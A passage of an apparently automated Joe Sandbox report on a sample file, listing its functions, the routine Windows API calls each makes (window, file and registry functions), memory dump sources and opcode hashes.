                                                                                      • Instruction Fuzzy Hash: 1731BC303686008FD750DB19D895B6A73E1EB95314F6082BBF8489B3A1E779EC41CB4E
                                                                                      Function 0041FB0C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FBA9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoScroll
                                                                                      • String ID:
                                                                                      • API String ID: 629608716-0
                                                                                      • Opcode ID: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                                      • Instruction ID: 884c2cb002146e47c45dd1875db58eae66db6a4caaf859e9ca4b80fd75174b4c
                                                                                      • Opcode Fuzzy Hash: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                                      • Instruction Fuzzy Hash: DD2130716087456FC340DF39D840696BBE4BB48344F148A3EA098C3341D774E99ACBD6
                                                                                      Function 00468368 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                                        • Part of subcall function 0041EE14: 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E908,?,00000001), ref: 0041EE69
                                                                                      • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,004683C6,?,00000000,?,?,004685D3,?,00000000,00468612), ref: 004683AA
                                                                                        • Part of subcall function 0041EEC8: IsWindow.USER32(8BF0EBFF), ref: 0041EED6
                                                                                        • Part of subcall function 0041EEC8: EnableWindow.USER32(8BF0EBFF,00000001), ref: 0041EEE5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
                                                                                      • String ID:
                                                                                      • API String ID: 1039859321-0
                                                                                      • Opcode ID: 467ce9893c8a2b941d671877d34955771c88eccab2483bb784be52c54abd03e3
                                                                                      • Instruction ID: 1e6c9ee491f26ebb38a393fd70065da3d13cda2054ea28a361ce8fb2712a9f85
                                                                                      • Opcode Fuzzy Hash: 467ce9893c8a2b941d671877d34955771c88eccab2483bb784be52c54abd03e3
                                                                                      • Instruction Fuzzy Hash: F0F0E9B1258300BFE7159B72EC56B1677E8E314B15F51447FF804C66D0EA7A5890C62D
                                                                                      Function 00440DC8 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                      • Instruction ID: f885d1546c0ddadd170268c7727831953bb7ef74118cb9c1630738a499be6481
                                                                                      • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                      • Instruction Fuzzy Hash: E3F06D70504109EFAF0CCF58D0658AF77A1EF48300B2084AFE60797790D638AE30E798
                                                                                      Function 004164C0 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 004164F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: cdcc0148ce654954751abbafc01dffb42bdee5d1888213000ee0bb92e9214fa3
                                                                                      • Instruction ID: a44329a4cc8b06b024a2b0eee2fd8d89e642962040674eee811c3e7967e458ca
                                                                                      • Opcode Fuzzy Hash: cdcc0148ce654954751abbafc01dffb42bdee5d1888213000ee0bb92e9214fa3
                                                                                      • Instruction Fuzzy Hash: F5F025B2200510AFDB84CF9CD9C0F9373ECEB0C210B0981A6FA08CF24AD220EC108BB0
                                                                                      Function 00414924 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0041495F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                      • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                      • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                      • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                      Function 0042CBA8 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,0042CBF0,?,00000001,?,?,00000000,?,0042CC42,00000000,0045162D,00000000,0045164E,?,00000000), ref: 0042CBD3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                                      • Instruction ID: dfed850972a7f4cfed0b3d6ce6ead54829112a593105f6481b619d55be1254e6
                                                                                      • Opcode Fuzzy Hash: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                                      • Instruction Fuzzy Hash: 1AE06571304708BFD701EB62AC93E5EBBACD745714B914876B400A7651D5B8AE00845C
                                                                                      Function 0044FF20 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FF60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: a92cf0aa8bb23f57ccdc9442b6704fbd4576b7ac5b6e0326e42d432a692528ee
                                                                                      • Instruction ID: 45ed5e217c844315310d89a20c49d2eff003bfa8467b370b0955f01a950c20be
                                                                                      • Opcode Fuzzy Hash: a92cf0aa8bb23f57ccdc9442b6704fbd4576b7ac5b6e0326e42d432a692528ee
                                                                                      • Instruction Fuzzy Hash: 39E0EDA53541583ED240AABCBC52F9767DC9759754F008033B998D7241D4619A158BA8
                                                                                      Function 0042E670 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451E7B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FormatMessage
                                                                                      • String ID:
                                                                                      • API String ID: 1306739567-0
                                                                                      • Opcode ID: 860b655ccada46b5013a8742cf2038536e52ba062f8b3e277fa769ce81e13b95
                                                                                      • Instruction ID: 7c82c80d86496392c3130c3e7de8882f0dfcc9e316fc406f93a4df2216b263d5
                                                                                      • Opcode Fuzzy Hash: 860b655ccada46b5013a8742cf2038536e52ba062f8b3e277fa769ce81e13b95
                                                                                      • Instruction Fuzzy Hash: 21E026617843112AF23514567C83B7F1A4E83C0B04FE4842B7B00DE3C3DAAEAD09429E
                                                                                      Function 00406300 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateWindowExA.USER32(00000000,004235EC,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 00406329
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                      • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                                      • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                      • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                                      Function 0042DC1C Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: 4676b834bccda8ccd94f8a4f379db04665fbdc7bc7b85aab9c145464b6c6dbba
                                                                                      • Instruction ID: 5aa87c08ff8936fcaaa84cf50ff31e6a06e3de0a8084b04fc6442f63f77fe161
                                                                                      • Opcode Fuzzy Hash: 4676b834bccda8ccd94f8a4f379db04665fbdc7bc7b85aab9c145464b6c6dbba
                                                                                      • Instruction Fuzzy Hash: BDE07EB2600129AF9B40DE8DDC81EEB37ADAB1D350F404016FA08D7200C2B4EC519BB4
                                                                                      Function 004536BC Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindClose.KERNEL32(00000000,000000FF,0046C888,00000000,0046D681,?,00000000,0046D6CA,?,00000000,0046D803,?,00000000,?,00000000), ref: 004536D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: 7d5519857b665cbbf82b8b35f439f608cfeada5da546942c6fbe9b0196f0527a
                                                                                      • Instruction ID: eca53ef0c4505d94b6e963a585f564cfd6265b0c9c03d819447d58a966c2af15
                                                                                      • Opcode Fuzzy Hash: 7d5519857b665cbbf82b8b35f439f608cfeada5da546942c6fbe9b0196f0527a
                                                                                      • Instruction Fuzzy Hash: 49E065705047004BCB24DF3A848121A7AD15F84321F08C56AAC58CB396E63DC4199616
                                                                                      Function 004145EC Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(00490192,?,004901B4,?,?,00000000,00490192,?,?), ref: 0041460B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                      • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                      • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                      • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                      Function 00406E78 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406E8C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: a86332fa630e211a890a26f820a456cfae7ee7da2a92b38f798d74d6102b1500
                                                                                      • Instruction ID: 5e9ef0cb41ef517b54198f539e7e4457f1ce254f1207c5e451c0fee893fabf4d
                                                                                      • Opcode Fuzzy Hash: a86332fa630e211a890a26f820a456cfae7ee7da2a92b38f798d74d6102b1500
                                                                                      • Instruction Fuzzy Hash: 3DD05B763082107AD620A55BAC44DA76BDCCFC5770F11063EB558C71C1D6309C01C675
                                                                                      Function 004235BC Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00423568: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042357D
                                                                                      • ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                                        • Part of subcall function 00423598: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 004235B4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoParametersSystem$ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3202724764-0
                                                                                      • Opcode ID: 05b12f49588f72d468172bd8f1b82f2cb8bfea04f415fe28581d7e625a87d56b
                                                                                      • Instruction ID: 6e8deb3ed7ffb4c54c7bf11bddd21d475954711d807402a63cfbe74293682e9f
                                                                                      • Opcode Fuzzy Hash: 05b12f49588f72d468172bd8f1b82f2cb8bfea04f415fe28581d7e625a87d56b
                                                                                      • Instruction Fuzzy Hash: 03D05E123812743102107ABB280998B42A84D862AB388043BB54CDB202E91E8A81A1AC
                                                                                      Function 00424234 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: TextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 530164218-0
                                                                                      • Opcode ID: c34688b727229efcedc1f2997f44e421d28f5fd8d0fc977b3f59e8ef08dab085
                                                                                      • Instruction ID: a3b20f4c882213fa23ff33249cd178fa67041ba6f44abe22b1f00704e939aabb
                                                                                      • Opcode Fuzzy Hash: c34688b727229efcedc1f2997f44e421d28f5fd8d0fc977b3f59e8ef08dab085
                                                                                      • Instruction Fuzzy Hash: 4CD05EE27011702BCB01BBED54C4AC667CC8B8829AB1940BBF918EF257C638CE448398
                                                                                      Function 0042CC00 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,00450CD7,00000000), ref: 0042CC0B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
                                                                                      • Instruction ID: 3d474633da5dc292dd1e9b08acfa0ea7ef8e6560f0837aa6ac70ccb6d2902417
                                                                                      • Opcode Fuzzy Hash: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
                                                                                      • Instruction Fuzzy Hash: 42C08CE03022001A9A1465BF2CC511F42C8891827A3A41F37F53CE32D2D27E88A72428
                                                                                      Function 004633A4 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00464010,00000000,00000000,00000000,0000000C,00000000), ref: 004633BC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                      • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                      • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                      • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                      Function 00406E28 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A834,0040CDE0,?,00000000,?), ref: 00406E45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
